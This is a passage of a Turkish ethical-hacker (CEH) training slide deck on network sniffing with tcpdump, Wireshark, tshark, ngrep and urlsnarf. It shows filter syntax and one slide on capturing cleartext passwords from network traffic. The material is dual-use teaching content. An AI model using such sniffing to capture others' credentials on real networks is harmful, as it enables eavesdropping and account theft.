 src ile kaynak portu dst ile hedef portu belirtebiliriz . dst ya
da src önekini kullanmazsak hem kaynak hemde hedef
portu alır.
 # tcpdump src port 23 and dst port 9876
BGA | CEH
@BGASecurity
Filtrelerle Çalışmak
 Şartlı ifadeler
 And
 Or
 Not
 # tcpdump -i eth0 -n not tcp port 22 or host
192.168.1.1
BGA | CEH
@BGASecurity
Layer 2 Başlıklarını Görüntüleme
BGA | CEH
@BGASecurity
Paket içeriği (payload) Görüntüleme
BGA | CEH
@BGASecurity
Nmap Taramaları ve tcpdump
BGA | CEH
@BGASecurity
Hping Taramalarının Karekteristigi
BGA | CEH
@BGASecurity
Sniffer Olarak Snort
BGA | CEH
@BGASecurity
Sniffer Olarak Snoop
 Solaris sistemler için sniffer programı
 Tcpdump benzeri kullanıma sahiptir.
BGA | CEH
@BGASecurity
Sniffer Olarak Wireshark
 Eski adı Ethereal
 Açık kaynak kodlu Sniffer aracı
 Grafik arabirimli/ komut satırı
 Bilinen çoğu işletim sistemlerinde çalışır
 Bilinen tüm protokolleri destekler
 Yakalanan paketleri kaydedebilme
 Kaydedilmiş paketleri diskten okuma
 Protokol renklendirme
BGA | CEH
@BGASecurity
Wireshark Ekranı
BGA | CEH
@BGASecurity
Paket Yakalama Seçenekleri
BGA | CEH
@BGASecurity
Yakalanan Paketler İçin İsim Çözme
BGA | CEH
@BGASecurity
Wireshark’da Filtresiz Yaşam
BGA | CEH
@BGASecurity
Filtreler
 Yakalanacak paketlere
uygulanır.
 Tcpdump formatı ile
aynıdır.
 Tcp port 22 and host
vpn.lifeoverip.net or icmp
 Yakalanan paketler
üzerinde analiz yapılırken
kullanılır.
 Farklı bir formata sahiptir.
 (Tcp.port eq 22) and
(ip.addr eq blabla...)
 Arabirimden filtre
yazılabilir
BGA | CEH
@BGASecurity
Capture Filter
 Tcp port 21
 Tcp port 21 and tcp port 1982
 Tcp port 22 and host vpn.lifeoverip.net or icmp
BGA | CEH
@BGASecurity
Display Filter
BGA | CEH
@BGASecurity
TCP Oturumlarında Paket Birleştirme
BGA | CEH
@BGASecurity
Wireshark Data Carving
BGA | CEH
@BGASecurity
Tshark
 Wireshark komut satırı aracı
 Tcpdump benzeri parametrelerle çalışır
 Tcpdump’dan en önemli farkı protokol detaylarını gösterebilmesi ve
protokol detaylarına göre filtreleme yapılabilmesidir.
BGA | CEH
@BGASecurity
Tcpdump & tshark farkı
BGA | CEH
@BGASecurity
Tshark Filter Kullanımı(-R)
 Display filter özelliği ile Tshark çözümleyebildiği protokollere ait
tüm detayları gösterebilir ve sadece bu detaylara ait paketleri
yakalamaya yardımcı olur.
 Amacımız dns trafiği içerisinde sadece www.lifeoverip.net
domainine ait sorgulamaları yakalamak istersek aşağıdaki gibi bir
filtreleme kullanılabilir.
BGA | CEH
@BGASecurity
Tshark Filter Kullanımı-II
HTTP trafiği içerisindeGET, PUT ve OPTIONS kullanılan istekleri yakalama
BirTCP Bağlantısına ait başlangıç ve bitiş paketlerini yakalama
BGA | CEH
@BGASecurity
Sniffer Olarak Eeye Iris
BGA | CEH
@BGASecurity
Network Grep:Ngrep
 Grep: UNIX/Linux sistemlerde dosya içerisinde belirli
düzene uyan stringlerin/satırların bulunmasını sağlar
 Ngrep(Network Grep): grep benzeri bir yazılım fakat
klasik dosyalarda değil de ağ trafiğinde arama/bulma
işlemi yapar.
BGA | CEH
@BGASecurity
Ngrep ile Ne Yapılabilir?
 http portu üzerinden kullanılan SSH bağlantılarını ngrep ile
keşfedebilirsiniz
 Ağda şifresiz trafik kullananların parolalarını kaydedip uyarabilirsiniz.
 Tünelleme programlarını ortamda hiçbir IPS, Firewall vs ye ihtiyaç
duymadan Ngrep ile yakalayabilirsiniz
BGA | CEH
@BGASecurity
Ngrep ile SMTP Analizi
BGA | CEH
@BGASecurity
Http Portundan Yapılan SSH
Bu komutu biraz daha geliştirip SSH portu harici herhangi bir porttan SSH
kullanmaya çalışanları izleyebilirsiniz.
BGA | CEH
@BGASecurity
Ngrep’i IDS Olarak Kullanma
Amaç: HTTP portu üzerinden yapılan fakat http
olmayan bağlantıları izleme
BGA | CEH
@BGASecurity
UrlSnarf
Trafikten pasif olarak HTTP isteklerini ayıklar
@BGASecurity
bgasecurity.com | @bgasecurity
Devamı için sonraki bölümlere geçiniz.

More Related Content

What's hot

SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber Security
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiKurtuluş Karasu
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19BGA Cyber Security
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak DerslerBGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriBGA Cyber Security
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıBGA Cyber Security
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuBGA Cyber Security
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıBGA Cyber Security
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBGA Cyber Security
 

What's hot (20)

EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
 
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma  ve Alınacak DerslerGüvenlik Sistemlerini Atlatma  ve Alınacak Dersler
Güvenlik Sistemlerini Atlatma ve Alınacak Dersler
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma Testleri
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
Kablosuz Ağlarda Güvenlik
Kablosuz Ağlarda GüvenlikKablosuz Ağlarda Güvenlik
Kablosuz Ağlarda Güvenlik
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim Notları
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı Simülasyonu
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan Saldırılar
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
 
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 

Viewers also liked

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18BGA Cyber Security
 
Her Yönü İle Siber Tehdit İstihbaratı
Her Yönü İle Siber Tehdit İstihbaratıHer Yönü İle Siber Tehdit İstihbaratı
Her Yönü İle Siber Tehdit İstihbaratıBGA Cyber Security
 
Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı BGA Cyber Security
 
Kali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADKali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADMehmet Ince
 
DDoS Saldırıları ve Korunma Yolları
DDoS Saldırıları ve Korunma YollarıDDoS Saldırıları ve Korunma Yolları
DDoS Saldırıları ve Korunma YollarıBGA Cyber Security
 
Özgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeÖzgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeBGA Cyber Security
 
OpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma ÖzellikleriOpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma ÖzellikleriBGA Cyber Security
 
Kablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıKablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıBGA Cyber Security
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıBGA Cyber Security
 
Güvenli Veri Silme ve Dosya Kurtarma
Güvenli Veri Silme ve Dosya KurtarmaGüvenli Veri Silme ve Dosya Kurtarma
Güvenli Veri Silme ve Dosya KurtarmaBGA Cyber Security
 
Yeni Nesil Küresel Savaş: Siber Saldırılar
Yeni Nesil Küresel Savaş: Siber SaldırılarYeni Nesil Küresel Savaş: Siber Saldırılar
Yeni Nesil Küresel Savaş: Siber SaldırılarBGA Cyber Security
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration TestingBGA Cyber Security
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiBGA Cyber Security
 
Ağ tabanlı Saldırı Tespit Sistemleri
Ağ tabanlı Saldırı Tespit SistemleriAğ tabanlı Saldırı Tespit Sistemleri
Ağ tabanlı Saldırı Tespit Sistemleriosmncht
 

Viewers also liked (18)

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
 
Her Yönü İle Siber Tehdit İstihbaratı
Her Yönü İle Siber Tehdit İstihbaratıHer Yönü İle Siber Tehdit İstihbaratı
Her Yönü İle Siber Tehdit İstihbaratı
 
Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı
 
Kali linux
Kali linuxKali linux
Kali linux
 
Kali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADKali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRAD
 
DDoS Saldırıları ve Korunma Yolları
DDoS Saldırıları ve Korunma YollarıDDoS Saldırıları ve Korunma Yolları
DDoS Saldırıları ve Korunma Yolları
 
Özgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS EngellemeÖzgür yazılımlarla DDOS Engelleme
Özgür yazılımlarla DDOS Engelleme
 
OpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma ÖzellikleriOpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma Özellikleri
 
Wimax sunum
Wimax sunumWimax sunum
Wimax sunum
 
Kablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıKablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı Araçları
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
 
Slideshare net
Slideshare netSlideshare net
Slideshare net
 
Güvenli Veri Silme ve Dosya Kurtarma
Güvenli Veri Silme ve Dosya KurtarmaGüvenli Veri Silme ve Dosya Kurtarma
Güvenli Veri Silme ve Dosya Kurtarma
 
Yeni Nesil Küresel Savaş: Siber Saldırılar
Yeni Nesil Küresel Savaş: Siber SaldırılarYeni Nesil Küresel Savaş: Siber Saldırılar
Yeni Nesil Küresel Savaş: Siber Saldırılar
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli Analiz
 
Mobile Application Penetration Testing
Mobile Application Penetration TestingMobile Application Penetration Testing
Mobile Application Penetration Testing
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) Eğitimi
 
Ağ tabanlı Saldırı Tespit Sistemleri
Ağ tabanlı Saldırı Tespit SistemleriAğ tabanlı Saldırı Tespit Sistemleri
Ağ tabanlı Saldırı Tespit Sistemleri
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiBGA Cyber Security
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ BGA Cyber Security
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBGA Cyber Security
 
Windows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziWindows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziBGA Cyber Security
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıBGA Cyber Security
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaBGA Cyber Security
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma sonBGA Cyber Security
 
Siber dunyada izleme ve takip
Siber dunyada izleme ve takipSiber dunyada izleme ve takip
Siber dunyada izleme ve takipAykut Özmen
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziBGA Cyber Security
 
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...Siber Güvenlik Derneği
 
W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIBGA Cyber Security
 
Windows Sistemler için Sysmon ve Wazuh Kullanarak Mitre ATT&CK Kurallarının ...
Windows Sistemler için Sysmon ve Wazuh Kullanarak  Mitre ATT&CK Kurallarının ...Windows Sistemler için Sysmon ve Wazuh Kullanarak  Mitre ATT&CK Kurallarının ...
Windows Sistemler için Sysmon ve Wazuh Kullanarak Mitre ATT&CK Kurallarının ...BGA Cyber Security
 
Güvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaGüvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaBGA Cyber Security
 
Siber Güvenlik Kış Kampı'18 Soruları
Siber Güvenlik Kış Kampı'18 SorularıSiber Güvenlik Kış Kampı'18 Soruları
Siber Güvenlik Kış Kampı'18 SorularıBGA Cyber Security
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...BGA Cyber Security
 
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiAçık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiBilgiO A.S / Linux Akademi
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiFatih Ozavci
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6 (20)

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
 
Windows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziWindows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım Analizi
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
 
Siber dunyada izleme ve takip
Siber dunyada izleme ve takipSiber dunyada izleme ve takip
Siber dunyada izleme ve takip
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
 
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...
Kurumsal Ağlarda Log Analizi Yöntemi İle Saldırı Tespiti - Huzeyfe Önal #Sibe...
 
W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – II
 
Windows Sistemler için Sysmon ve Wazuh Kullanarak Mitre ATT&CK Kurallarının ...
Windows Sistemler için Sysmon ve Wazuh Kullanarak  Mitre ATT&CK Kurallarının ...Windows Sistemler için Sysmon ve Wazuh Kullanarak  Mitre ATT&CK Kurallarının ...
Windows Sistemler için Sysmon ve Wazuh Kullanarak Mitre ATT&CK Kurallarının ...
 
Güvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaGüvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi Toplama
 
Siber Güvenlik Kış Kampı'18 Soruları
Siber Güvenlik Kış Kampı'18 SorularıSiber Güvenlik Kış Kampı'18 Soruları
Siber Güvenlik Kış Kampı'18 Soruları
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
 
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiAçık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
 
BGA Staj Okulu Sınavı'17
BGA Staj Okulu Sınavı'17BGA Staj Okulu Sınavı'17
BGA Staj Okulu Sınavı'17
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
 
10 Adımda Sızma Testleri
10 Adımda Sızma Testleri10 Adımda Sızma Testleri
10 Adımda Sızma Testleri
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 

More from BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
